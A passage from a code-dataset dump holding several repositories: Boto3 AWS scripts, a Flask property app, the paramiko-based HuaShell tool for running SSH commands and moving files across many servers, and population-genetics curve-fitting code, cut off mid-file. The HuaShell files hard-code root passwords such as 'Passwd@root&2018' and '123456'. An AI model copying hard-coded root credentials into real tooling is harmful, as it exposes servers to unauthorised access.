self.hidden_size).cuda()), \n Variable(torch.zeros(self.batch_size, self.hidden_size).cuda()))\n\n\n\n def reparameterize(self, mu, logvar):\n if self.training:\n logvar = logvar.mul(0.5).exp_()\n eps = Variable(logvar.data.new(logvar.size()).normal_())\n return eps.mul(logvar).add_(mu)\n else:\n return mu\n\n def forward(self, input):\n embedded = self.embed(input.view(-1, self.input_size))\n self.hidden = self.lstm(embedded, self.hidden)\n mu = self.mu_net(self.hidden[0])\n logvar = self.logvar_net(self.hidden[0])\n z = self.reparameterize(mu, logvar)\n return z, mu, logvar\n \n"
}
] | 3 |
anandg112/Boto3-recipes | https://github.com/anandg112/Boto3-recipes | 4559533d21653a24fbc6d811b1a8a4f96dc9d0a8 | 7abebae6cac76cc9d83b43364235b0badbe1cb7a | 01217c84e0c65797e834cc2684dfc36a8cfdc9b7 | refs/heads/master | 2021-09-12T09:47:27.265879 | 2018-04-16T02:14:25 | 2018-04-16T02:14:25 | 124,609,527 | 2 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.7017543911933899,
"alphanum_fraction": 0.7222222089767456,
"avg_line_length": 21.866666793823242,
"blob_id": "7a7ca59336557731f017a04df5c8d3a67f9f530c",
"content_id": "fef9e2551c3374a51820232dd5f8c0de514c0acc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 342,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 15,
"path": "/put_bucket.py",
"repo_name": "anandg112/Boto3-recipes",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n#first argument is bucket name and second argument is file name\n\nimport sys\nimport boto3\ns3 = boto3.resource(\"s3\")\nbucket_name = sys.argv[1]\nobject_name = sys.argv[2]\n\ntry:\n response = s3.Object(bucket_name, object_name).put(Body=open(object_name, 'rb'))\n print response\nexcept Exception as error:\n print error"
},
{
"alpha_fraction": 0.8142856955528259,
"alphanum_fraction": 0.8428571224212646,
"avg_line_length": 33.5,
"blob_id": "009fefede02c50fc415af3e52e753464f358d14f",
"content_id": "03879e9b543181d84c10240717569860dc7b07d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 70,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 2,
"path": "/README.md",
"repo_name": "anandg112/Boto3-recipes",
"src_encoding": "UTF-8",
"text": "# Boto3-Automation\nCloud Infrastructure automation with Python Boto3 \n"
},
{
"alpha_fraction": 0.6788079738616943,
"alphanum_fraction": 0.6887417435646057,
"avg_line_length": 19.200000762939453,
"blob_id": "4a602b8cf42ad55e3fe9486b8d07291d28df11de",
"content_id": "0d385ee9c6f542eed4ed385c770fe853debd979d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 302,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 15,
"path": "/delete_db_instance.py",
"repo_name": "anandg112/Boto3-recipes",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport sys\nimport boto3\n\ndb = sys.argv[1] #name of the instance to be deleted\n\nrds = boto3.client('rds')\ntry:\n response = rds.delete_db_instance(\n DBInstanceIdentifier=db,\n SkipFinalSnapshot=True)\n print (response)\nexcept Exception as error:\n print (error)"
},
{
"alpha_fraction": 0.6544715166091919,
"alphanum_fraction": 0.6788617968559265,
"avg_line_length": 16.285715103149414,
"blob_id": "9877e27775c3f7d4588109df5f2a4e0ad8842102",
"content_id": "f16b84f62f6c5da367b7a1004028700e2cbb5822",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 246,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 14,
"path": "/delete_buckets.py",
"repo_name": "anandg112/Boto3-recipes",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport sys\nimport boto3\n\ns3 = boto3.resource('s3')\n\nfor bucket_name in sys.argv[1:]:\n bucket = s3.Bucket(bucket_name)\ntry:\n respnose = bucket.delete()\n print response\nexcept Exception as error:\n print error\n "
},
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.649193525314331,
"avg_line_length": 23.799999237060547,
"blob_id": "eff7cb9e743419091cf99d53ad8b312406802472",
"content_id": "192dcada75bbcb69eb2dc536f01680c9572b086f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 248,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 10,
"path": "/create_bucket.py",
"repo_name": "anandg112/Boto3-recipes",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport sys\nimport boto3\ns3 = boto3.resource(\"s3\")\nfor bucket_name in sys.argv[1:]:\n try:\n response = s3.create_bucket(Bucket=bucket_name)\n print (response)\n except Exception as error:\n print (error)\n"
}
] | 5 |
palmer-matthew/info3180-project1 | https://github.com/palmer-matthew/info3180-project1 | 469d6d5357b5f0969abc79cf7063d98a495949cb | be0198c07378065a77018aad18afc8301a082651 | 05e26bc989b1eb688546d402a1f9082e245c8237 | refs/heads/master | 2023-03-19T21:58:15.659861 | 2021-03-17T05:02:02 | 2021-03-17T05:02:02 | 347,273,391 | 0 | 0 | null | 2021-03-13T04:38:08 | 2021-03-13T21:40:06 | 2021-03-17T04:02:10 | null | [
{
"alpha_fraction": 0.6002490520477295,
"alphanum_fraction": 0.6251556873321533,
"avg_line_length": 31.15999984741211,
"blob_id": "ab38c223648d9bd2e1c91cf0175a56ece564a811",
"content_id": "15a2bd32eef93b3dec751953581adcc0de6065ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 803,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 25,
"path": "/app/models.py",
"repo_name": "palmer-matthew/info3180-project1",
"src_encoding": "UTF-8",
"text": "from . import db\n\nclass Property(db.Model):\n\n __tablename__ = 'property'\n\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n title = db.Column(db.String(150))\n description = db.Column(db.String(255))\n no_room = db.Column(db.String(10))\n no_bath = db.Column(db.String(10))\n price = db.Column(db.String(20))\n type = db.Column(db.String(20))\n location = db.Column(db.String(150))\n filename = db.Column(db.String(255)) \n\n def __init__(self, title, description, no_room, no_bath, price, type, location, filename):\n self.title = title\n self.description = description\n self.no_room = no_room\n self.no_bath = no_bath\n self.price = price\n self.type = type\n self.location = location\n self.filename = filename"
},
{
"alpha_fraction": 0.6464007496833801,
"alphanum_fraction": 0.6590467095375061,
"avg_line_length": 40.979591369628906,
"blob_id": "08737aebcc069a85382cde1d757aea0a662f0b4f",
"content_id": "f215efed2cea93071fa804d702dcac6f2c0ef9fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2056,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 49,
"path": "/app/forms.py",
"repo_name": "palmer-matthew/info3180-project1",
"src_encoding": "UTF-8",
"text": "from flask_wtf import FlaskForm\nfrom flask_wtf.file import FileAllowed, FileRequired, FileField\nfrom wtforms.fields import StringField, TextAreaField, IntegerField, DecimalField, SelectField\nfrom wtforms.validators import InputRequired, ValidationError\nfrom re import match\n\n# Custom Validators \ndef length_check(max = -1):\n def length(form, field):\n if len(field.data) > max:\n raise ValidationError('Data is greater than {} characters'.format(max)) \n return length\n\ndef valid_number(form, field):\n def isInt(n):\n try:\n int(n)\n except:\n return False\n return True\n \n def isFloat(n):\n try:\n float(n)\n except:\n # Reg expression retrieved from https://stackoverflow.com/questions/5917082/regular-expression-to-match-numbers-with-or-without-commas-and-decimals-in-text\n # Contributor: Justin Morgan, Retrieved on March 16, 2021\n if match(r'^(\\d*\\.?\\d+|\\d{1,3}(,\\d{3})*(\\.\\d+)?)$', n) != None:\n return True\n return False\n return True\n\n if isInt(field.data) or isFloat(field.data):\n pass\n else:\n raise ValidationError('Value entered is not a valid integer or decimal') \n\n\n\nclass PropertyForm(FlaskForm):\n \n title = StringField('Property Title', validators=[InputRequired(), length_check(max=145)])\n description = TextAreaField('Description', validators=[InputRequired(), length_check(max=255)])\n roomnum = StringField('No. of Rooms', validators=[InputRequired(), valid_number])\n bathnum = StringField('No. of Bathrooms', validators=[InputRequired(), valid_number])\n price = StringField('Price', validators=[InputRequired(), valid_number])\n type = SelectField('Property Type',validators=[InputRequired()], choices=[('House', 'House'), ('Apartment', 'Apt')])\n location = StringField('Location', validators=[InputRequired(), length_check(max=150)])\n photo = FileField('Photo Upload', validators= [FileRequired(), FileAllowed(['jpg','png','Images only!'])])"
}
] | 2 |
liupeng110/HuaShell | https://github.com/liupeng110/HuaShell | ecff98b83262cf84b1d4921e89054e43a24c5822 | cee8218dcfc4be746026d899249a4cdd5fc2269e | 05879da0b550b118f2aa2659f098075b610b63fe | refs/heads/master | 2021-01-16T15:41:50.832838 | 2019-04-02T03:08:26 | 2019-04-02T03:08:26 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6042810082435608,
"alphanum_fraction": 0.6086717844009399,
"avg_line_length": 20.951807022094727,
"blob_id": "1843f4911348e926727a3d868385fac81b737286",
"content_id": "f5b51ef2b060b50c50815e540acd424baf3a8c74",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2240,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 83,
"path": "/HuaShell.py",
"repo_name": "liupeng110/HuaShell",
"src_encoding": "UTF-8",
"text": "from py_ssh.ssh_py import ssh2,download,upload\nimport datetime\nimport os\nimport threading\n\nopera= input('''\n\t* 首先请确保已经在 ./params文件夹中 填好了必要参数\n\t================================================\n\t================================================\n\t1.批量输入命令\n\t2.批量上传文件\n\t3.批量下载文件\n\n\t$你要执行什么操作(输入序号):''')\nif opera == '1':\n\t#cmd\n\t#读取账号、密码\n\tusername = 'root'\n\tpassword = 'Passwd@root&2018'\n\t#读取命令\n\tcmds_f=open(\".\\\\params\\\\cmds.txt\")\n\tcmds=cmds_f.readlines()\n\tcmds_f.close()\n #读取服务器列表\n\thosts_f=open(\".\\\\params\\\\ip_list.txt\")\n\thosts=hosts_f.readlines()\n\thosts_f.close()\n\tfor host_ip in hosts:\n\t\thost_ip = host_ip.strip()\n\t\ta=threading.Thread(target=ssh2,args=(host_ip,username,password,cmds))\n\t\ta.start()\n\nelif opera == '2':\n\t#upload\n\tdst_dir_path = input('请输入上传目的目录路径(直接回车默认上传至/tmp/):')\n\tif dst_dir_path == '':\n\t\tdst_dir_path = '/tmp/'\n\t\n\t#读取账号、密码\n\tusername = 'root'\n\tpassword = 'Passwd@root&2018'\n\t#读取上传文件所在文件夹路径\n\tupload_dir = '.\\\\upload_dir'\n\t#读取服务器列表\n\thosts_f=open(\".\\\\params\\\\ip_list.txt\")\n\thosts=hosts_f.readlines()\n\thosts_f.close()\n\n\tfor host_ip in hosts:\n\t\thost_ip = host_ip.strip()\n\t\n\t\ta=threading.Thread(target=upload,args=(host_ip,username,password,upload_dir,dst_dir_path))\n\t\ta.start()\n\n\nelif opera =='3':\n\t#download\n\tprint('友情提示:确保下载源的文件夹无嵌套文件夹,下载目的文件夹是空文件夹')\n\tprint('-------------------------------------------------------------')\n\tsrc_dir_path = input('请输入下载源的路径文件夹(直接回车默认上传至/tmp/):')\n\tif src_dir_path == '':\n\t\tsrc_dir_path = '/tmp/'\n\t#读取账号、密码\n\tusername = 'root'\n\tpassword = 'Passwd@root&2018'\n\t#读取下载文件目的文件夹路径\n\tdownload_dir = '.\\\\download_dir'\n\t#读取服务器列表\n\thosts_f=open(\".\\\\params\\\\ip_list.txt\")\n\thosts=hosts_f.readlines()\n\thosts_f.close()\n\t\n\tfor host_ip in hosts:\n\t\thost_ip = host_ip.strip()\n\n\t\ta=threading.Thread(target=download,args=(host_ip,username,password,download_dir,src_dir_path))\n\t\ta.start()\n\n\nelse:\n\tprint('请输入序号!')\n\ninput('')\n"
},
{
"alpha_fraction": 0.5754671692848206,
"alphanum_fraction": 0.6008625030517578,
"avg_line_length": 20.090909957885742,
"blob_id": "8a8ca8ca9ba9c04ffd15bfdeb2da78636a0a2d28",
"content_id": "f4b1c4bed8cff06af2e51ad795145390a72b1d0f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2273,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 99,
"path": "/py_ssh/ip_range.py",
"repo_name": "liupeng110/HuaShell",
"src_encoding": "UTF-8",
"text": "def isIP(str1):\n\ttag = True\n\tstr1 = str1.strip()\n\tsection_num = len(str1.split('.')) # section_num == 4\n\tif section_num != 4 :\n\t\ttag = False\n\t\treturn tag\n\n\ttry:\n\t\tfor i in range(0,4):\n\t\t\tif int(str1.split('.')[i]) < 0 :\n\t\t\t\ttag = False\n\t\t\t\tbreak\n\t\t\telif int(str1.split('.')[i]) > 255 :\n\t\t\t\ttag = False\n\t\t\t\tbreak\n\texcept :\n\t\ttag = False\n\tfinally:\n\t\treturn tag\n\n\ndef isIPrange(str1):\n\tstr1 = str1.strip()\n\tif isIP(str1.split(',')[0].split('-')[0]) :\n\t\treturn True\n\telse:\n\t\treturn False\n\n\ndef iprange_to_list(ip_range):\n\tip_list = []\n\tip_range = ip_range.strip()\n\tcomma_section_num = len(ip_range.split(','))\n\tcomma_section = ip_range.split(',')\n\tfor i in range(0,comma_section_num):\n\t\tcur_comma_section = comma_section[i].strip()\n\t\tif len(cur_comma_section.split('-')) == 2:\n\t\t\t#有范围,eg: 192.168.1.1-100\n\t\t\tstart_ip = cur_comma_section.split('-')[0]\n\t\t\tstart_ip_d = int(start_ip.split('.')[3])\n\t\t\tend_ip_d = int(cur_comma_section.split('-')[1])\n\t\t\tip_abc = start_ip.split('.')[0]+'.'+start_ip.split('.')[1]+'.'+start_ip.split('.')[2]\n\t\t\tfor d in range(start_ip_d,end_ip_d+1):\n\t\t\t\tcur_ip = ip_abc+'.'+str(d)\n\t\t\t\tip_list.append(cur_ip)\n\n\t\telif len(cur_comma_section.split('-')) == 1:\n\t\t\t#单个IP\n\t\t\tip_list.append(cur_comma_section)\n\t\telse:\n\t\t\tprint('Error:IP_range输入格式不合规')\n\t\t\treturn -1\n\treturn ip_list\n\n\n\n\n\n\ndef ip_parse(str1):\n\t#输入的如果是IP range,则返回ip_list\n\t#输入的如果是文件,则返回文件中的ip_list\n\tip_list = []\n\tstr1 = str1.strip()\n\tif isIPrange(str1) :\n\t\t#输入的是ip range\n\t\tip_list = iprange_to_list(str1)\n\t\tfor host in ip_list:\n\t\t\tif not isIP(host):\n\t\t\t\tprint('Error:IP_range输入格式不合规')\n\t\t\t\treturn -1\n\t\t\n\telse :\n\t\t#输入的是文件路径\n\t\twith open(str1,'r') as f:\n\t\t\thosts = f.readlines()\n\t\t\tfor host in hosts:\n\t\t\t\tif isIP(host):\n\t\t\t\t\thost = host.strip('\\n')\n\t\t\t\t\tip_list.append(host)\n\t\t\t\telse:\n\t\t\t\t\tprint('Error:'+str1+'文件中存在不合规ip')\n\t\t\t\t\treturn -1\n\treturn ip_list\n\n\nif __name__=='__main__':\n\t'''\n\tip = input('请输入测试IP:')\n\tprint(isIP(ip))\n\tip_r = input('请输入测试IP_range:')\n\tprint(isIPrange(ip_r))\n\t\n\tip_r = input('请输入测试IP_range:')\n\tprint(iprange_to_list(ip_r))\n\t'''\n\tstr1 = input('请输入测试IP_range或文件路径:')\n\tprint(ip_parse(str1))"
},
{
"alpha_fraction": 0.5914502143859863,
"alphanum_fraction": 0.5957792401313782,
"avg_line_length": 20.22988510131836,
"blob_id": "0ed7b0c8c936d1d5e1c7e0910d97cdfd9f308a58",
"content_id": "e5bd836f9eb49509f1fa7d5c573b4122f21e963f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2308,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 87,
"path": "/HuaShell_pithy.py",
"repo_name": "liupeng110/HuaShell",
"src_encoding": "UTF-8",
"text": "from py_ssh.ssh_py import ssh2_pithy,download,upload\nimport datetime\nimport os\nimport threading\nfrom py_ssh.ip_range import ip_parse\n\nopera= input('''\n\t* 命令手工输入,ip手工指定\n\t================================================\n\t================================================\n\t1.批量输入命令\n\t2.批量上传文件\n\t3.批量下载文件\n\n\t$你要执行什么操作(输入序号):''')\nif opera == '1':\n\t#cmd\n\t#读取账号、密码\n\tusername = 'root'\n\tpassword = 'Passwd@root&2018'\n\n\n #读取服务器列表\n\tstr_ip = input('请输入IP_range或ip_list文件路径:')\n\thosts = ip_parse(str_ip)\n\t#输入命令\n\twhile True:\n\t\tcmd = input('请输入命令#')\n\t\t\n\t\tif cmd == 'quit' :\n\t\t\tbreak\n\t\telif cmd == 'show help':\n\t\t\tprint('''\t\tshow help help file\n\t\tquit quit Huashell''')\n\t\telse:\n\t\t\tfor host_ip in hosts:\n\t\t\t\ta=threading.Thread(target=ssh2_pithy,args=(host_ip,username,password,cmd))\n\t\t\t\ta.start()\n\t\t\t\ta.join()\n\t\t\t\t\n\t\t\t\t\n\nelif opera == '2':\n\t#upload\n\tdst_dir_path = input('请输入上传目的目录路径(直接回车默认上传至/tmp/):')\n\tif dst_dir_path == '':\n\t\tdst_dir_path = '/tmp/'\n\t\n\t#读取账号、密码\n\tusername = 'root'\n\tpassword = 'Passwd@root&2018'\n\t#读取上传文件所在文件夹路径\n\tupload_dir = '.\\\\upload_dir'\n\n\t#读取服务器列表\n\tstr_ip = input('请输入IP_range或ip_list文件路径:')\n\thosts = ip_parse(str_ip)\n\n\n\tfor host_ip in hosts:\t\n\t\ta=threading.Thread(target=upload,args=(host_ip,username,password,upload_dir,dst_dir_path))\n\t\ta.start()\n\n\nelif opera =='3':\n\t#download\n\tprint('友情提示:确保下载源的文件夹无嵌套文件夹,下载目的文件夹是空文件夹')\n\tprint('-------------------------------------------------------------')\n\tsrc_dir_path = input('请输入下载源的路径文件夹(直接回车默认上传至/tmp/):')\n\tif src_dir_path == '':\n\t\tsrc_dir_path = '/tmp/'\n\t#读取账号、密码\n\tusername = 'root'\n\tpassword = 'Passwd@root&2018'\n\t#读取下载文件目的文件夹路径\n\tdownload_dir = '.\\\\download_dir'\n\t#读取服务器列表\n\tstr_ip = input('请输入IP_range或ip_list文件路径:')\n\thosts = ip_parse(str_ip)\n\t\n\tfor host_ip in hosts:\n\t\ta=threading.Thread(target=download,args=(host_ip,username,password,download_dir,src_dir_path))\n\t\ta.start()\n\n\nelse:\n\tprint('请输入序号!')\n\n"
},
{
"alpha_fraction": 0.5211864113807678,
"alphanum_fraction": 0.5355932116508484,
"avg_line_length": 34.01980209350586,
"blob_id": "a34c1a2f4fdb0d395fbe2f7156323d5955b01aa8",
"content_id": "df196d26e40b325b72a50e6d7aeb9e93dfe39708",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3582,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 101,
"path": "/py_ssh/ssh_py.py",
"repo_name": "liupeng110/HuaShell",
"src_encoding": "UTF-8",
"text": "#-*- coding: utf-8 -*-\n#!/usr/bin/python\nimport paramiko\nimport datetime\nimport os\nimport threading\ndef ssh2(ip,username,passwd,cmd):\n try:\n paramiko.util.log_to_file('paramiko________.log')\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip,22,username,passwd,timeout=5)\n for m in cmd:\n stdin,stdout,stderr = ssh.exec_command(m)\n #stdin.write(\"Y\") #简单交互,输入 ‘Y’\n out = stdout.readlines()\n # outerr = stderr.readlines()\n #屏幕输出\n for o in out:\n print (o)\n print ('%s %s\\tOK\\n'%(ip,m))\n ssh.close()\n except :\n print ('%s\\tError\\n'%(ip))\n\ndef ssh2_pithy(ip,username,passwd,cmd):\n try:\n paramiko.util.log_to_file('paramiko________.log')\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip,22,username,passwd,timeout=5)\n \n stdin,stdout,stderr = ssh.exec_command(cmd)\n out = stdout.readlines()\n #屏幕输出\n print ('[%s@%s]#%s\\n'%(username,ip,cmd))\n for o in out:\n print (o) \n ssh.close()\n except :\n print ('%s\\tError\\n'%(ip))\n finally:\n \treturn 1\n\n\ndef download(ip, username, passwd, local_dir, remote_dir):\n try:\n paramiko.util.log_to_file('paramiko_download.log')\n t = paramiko.Transport((ip,22))\n t.connect(username=username,password=passwd)\n sftp = paramiko.SFTPClient.from_transport(t)\n files = sftp.listdir(remote_dir)\n\n\n for f in files:\n print ('')\n print ('############################')\n print ('Beginning to download file from %s %s ' % (ip, datetime.datetime.now()))\n print ('Downloading file:', os.path.join(remote_dir, f))\n sftp.get(os.path.join(remote_dir, f), os.path.join(local_dir, f))#下载\n print ('Download file success %s ' % datetime.datetime.now())\n print ('')\n print ('############################')\n t.close()\n except:\n print (\"connect error!\")\n\n\ndef upload(ip, username, passwd, local_dir, remote_dir):\n try:\n paramiko.util.log_to_file('paramiko_upload.log')\n t = paramiko.Transport((ip, 22))\n t.connect(username=username, password=passwd)\n sftp = paramiko.SFTPClient.from_transport(t)\n #files = sftp.listdir(remote_dir)\n files = os.listdir(local_dir)\n for f in files:\n print ('')\n print ('############################')\n print ('Beginning to upload file to %s %s ' % (ip, datetime.datetime.now()))\n print ('Uploading file:', os.path.join(local_dir, f))\n sftp.put(os.path.join(local_dir, f), os.path.join(remote_dir, f))#上传\n print ('Upload file success %s ' % datetime.datetime.now())\n print ('')\n print ('############################')\n t.close()\n except:\n print (\"connect error!\")\n print (ip, \"fail!\")\n\n\nif __name__=='__main__':\n\n a=threading.Thread(target=ssh2,args=('10.0.0.88','root','123456',['mkdir /root/look_at_this/','ls']))\n a.start()\n \n a=threading.Thread(target=upload,args=('10.0.0.88','root','123456','D:\\\\python-learn\\\\test_upload','/tmp/upload/'))\n a.start()\n \n a=threading.Thread(target=download,args=('10.0.0.88','root','123456','D:\\\\python-learn\\\\test_upload','/root/look_at_this/'))\n a.start()\n "
},
{
"alpha_fraction": 0.5840163826942444,
"alphanum_fraction": 0.6331967115402222,
"avg_line_length": 13.727272987365723,
"blob_id": "33bb052741d4e7a3805044a007192145cc287e67",
"content_id": "34f0cf4fffb88bfe131c29f4258aeba77a1bf970",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 766,
"license_type": "permissive",
"max_line_length": 44,
"num_lines": 33,
"path": "/README.md",
"repo_name": "liupeng110/HuaShell",
"src_encoding": "UTF-8",
"text": "**HuaShell** \n1. 批量执行指定命令:\n需要填好params文件夹里的: \n```\nip_list.txt \t#指定指定服务器的ip列表\ncmds.txt \t#需要批量执行的命令\n```\n2. 批量上传文件:\n* 需要填好params文件夹里的:\n```\nip_list.txt \t#指定指定服务器的ip列表\n```\n* 将需要上传的所有文件都放在upload_dir里\n3. 批量下载文件: \n* 需要填好params文件夹里的:\n```\nip_list.txt \t#指定指定服务器的ip列表\n```\n* 保证download_dir文件夹在批量下载前是空的\n\n---\n**HuaShell_pithy** \n\n* ip可以手动输入ip_range或者文件路径 \n\n > 示例 1.1.1.1-10,2.2.2.2,3.3.3.3-5 \n > 示例 ip_list.txt \n\n* 命令手工输入\n\n---\n**Function Screenshot** \n \n"
}
] | 5 |
ingrid-miriel/PickingClones | https://github.com/ingrid-miriel/PickingClones | 445d705c7a588edefc78d03fc378dd92c42c93b3 | 85828518b2c3e7259eb1fb249892b854461ef9dd | 0def2b8623edbc589c00a680acfc3d43952eca8f | refs/heads/master | 2023-04-06T23:09:12.935709 | 2022-06-14T12:17:08 | 2022-06-14T12:17:08 | 276,872,406 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6227741241455078,
"alphanum_fraction": 0.6412839889526367,
"avg_line_length": 45.39130401611328,
"blob_id": "eadc266413a5007528345ef6dadddd10c39cd8f5",
"content_id": "f46adcb1f00105bf58e0087df1f8716015ba6245",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4269,
"license_type": "no_license",
"max_line_length": 206,
"num_lines": 92,
"path": "/CurveFitting.py",
"repo_name": "ingrid-miriel/PickingClones",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 7 14:19:49 2020\n\n@author: ingrid\n\"\"\"\n\ndef curve_fitting(input, prop_iMLG):\n\n import pandas as pd\n import numpy as np\n \n data = pd.read_csv(input, index_col=0)\n if data.shape[0] < 1000:\n raise ValueError('The CurveFitting script has to be run on the Probs_for_Sample.csv file, which you get after specifying a sample size of interest using the sample = x option in the GenRis script.')\n numgenos = pd.to_numeric(list(data.columns))\n fitting = pd.DataFrame(numgenos)\n mean = np.mean(data, axis = 0)\n fitting['mean'] = mean.values\n perc = np.percentile(data.T, [16, 84], axis = 1) # 68% conf. interval = standard deviation\n perc = perc.T\n perc = pd.DataFrame(perc)\n fitting = pd.merge(fitting, perc, right_index=True, left_index=True)\n fitting = fitting.rename(columns={\"0_x\": \"numgenos\", \"0_y\": \"low_perc\", 1:\"up_perc\"})\n \n lowPerc = fitting[['numgenos', 'low_perc']]\n lowPerc = lowPerc[lowPerc['low_perc'] != 0] # removes numgenos with low_perc=0\n \n upPerc = fitting[['numgenos', 'up_perc']]\n upPerc = upPerc[upPerc['up_perc'] != 0] # removes numgenos with up_perc=0\n \n \n # curve fitting\n import scipy as sp\n from scipy.optimize import curve_fit\n def power_law(x, a, b):\n return a*np.power(x, b)\n # Fit the power-law data\n pars1, cov1 = curve_fit(f=power_law, xdata=fitting['mean'], ydata=fitting['numgenos'], p0=[0, 0], bounds=(-np.inf, np.inf))\n if len(lowPerc.index) > 2: # curve fitting is not possible with too few data points\n pars2, cov2 = curve_fit(f=power_law, xdata=lowPerc['low_perc'], ydata=lowPerc['numgenos'], p0=[0, 0], bounds=(-np.inf, np.inf))\n if len(upPerc.index) > 2: # curve fitting is not possible with too few data points\n pars3, cov3 = curve_fit(f=power_law, xdata=upPerc['up_perc'], ydata=upPerc['numgenos'], p0=[0, 0], bounds=(-np.inf, np.inf))\n \n # Create figure and add axes object\n import matplotlib as mpl\n import matplotlib.pyplot as plt\n mpl.rcParams.update(mpl.rcParamsDefault) \n lowPerc = lowPerc.sort_values(by=['low_perc'], ascending=False) # sort values to get smooth curve\n upPerc = upPerc.sort_values(by=['up_perc'], ascending=False)\n \n fig, ax = plt.subplots()\n ax.plot(fitting['mean'], power_law(fitting['mean'], *pars1), linewidth=2, color='black')\n if len(lowPerc.index) > 2:\n ax.plot(lowPerc['low_perc'], power_law(lowPerc['low_perc'], *pars2), linestyle='--', linewidth=1, color='black')\n else: # the lower precentile for most/all data points is 0\n plt.axvline(x=0, linestyle='--', linewidth=1, color='black')\n if len(upPerc.index) > 2:\n ax.plot(upPerc['up_perc'], power_law(upPerc['up_perc'], *pars3), linestyle='--', linewidth=1, color='black') \n ax.set(xlabel = \"probability of picking identical MLGs\", ylabel = \"number of genotypes\")\n fig.savefig(\"FittedCurve_ProbNumgenos.pdf\")\n \n \n # calculate R square\n f = power_law\n xdata=fitting['mean']\n ydata=fitting['numgenos']\n popt, pcov = curve_fit(f, xdata, ydata)\n residuals = ydata-f(xdata, *popt)\n ss_res = np.sum(residuals**2) \n ss_tot = np.sum((ydata-np.mean(ydata))**2)\n r_squared = round(1 - (ss_res / ss_tot), 3)\n print('R^2 of the curve fitted through the means is', r_squared,'.')\n \n \n # use function to calculate genotype number for specific clone picking probability\n est_mean = round(power_law(prop_iMLG, *pars1), 2)\n if len(lowPerc.index) > 2:\n est_low_perc = round(power_law(prop_iMLG, *pars2), 2)\n else:\n est_low_perc = 0\n if len(upPerc.index) > 2:\n est_high_perc = round(power_law(prop_iMLG, *pars3), 2)\n else:\n est_high_perc = \"unknown\"\n print('With a proportion of', prop_iMLG, 'identical MLGs, you can expect around', est_mean, '(',est_low_perc, '< σ <', est_high_perc,') distinct genotypes in your sample.')\n if len(lowPerc.index) < 3 or len(upPerc.index) < 3:\n print('The probability of picking identical MLGs across the chosen number of genotypes is generally too close to 0 to accurately estimate lower and/or upper percentiles.')\n\nif __name__ == \"__main__\":\n curve_fitting()\n"
},
{
"alpha_fraction": 0.5542188286781311,
"alphanum_fraction": 0.5703691244125366,
"avg_line_length": 43.94814682006836,
"blob_id": "0367ed87975b186e471d560879bfdc5193901eea",
"content_id": "c4750da198590c43f0768eb880894a531dbb9c35",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6070,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 135,
"path": "/GenRis.py",
"repo_name": "ingrid-miriel/PickingClones",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 2 10:27:03 2020\n\n@author: ingrid\n\"\"\"\ndef genris(numgenos, days, growthrate, sd, samplesize, mincell, maxcell, **kwargs): \n import numpy as np\n if np.size(days) != 1 or np.size(growthrate) != 1:\n raise ValueError('Days and/or growthrate have each to be defined by exactly one value!')\n # define variables\n elif np.size(numgenos) > 1 and np.size(samplesize) > 1 and np.size(sd) == 1:\n numgenos = np.array(numgenos)\n samplesize = np.array(samplesize)\n sd = np.array([sd])\n array = np.zeros((len(numgenos), len(samplesize), 10))\n x = samplesize\n y = numgenos\n x_title = \"sample size\"\n y_title = \"number of genotypes\"\n z = \"NumgenosSamplesize\"\n elif np.size(sd) > 1 and np.size(samplesize) > 1 and np.size(numgenos) == 1:\n sd = np.array(sd)\n numgenos = np.array([numgenos])\n samplesize = np.array(samplesize)\n array = np.zeros((len(sd), len(samplesize), 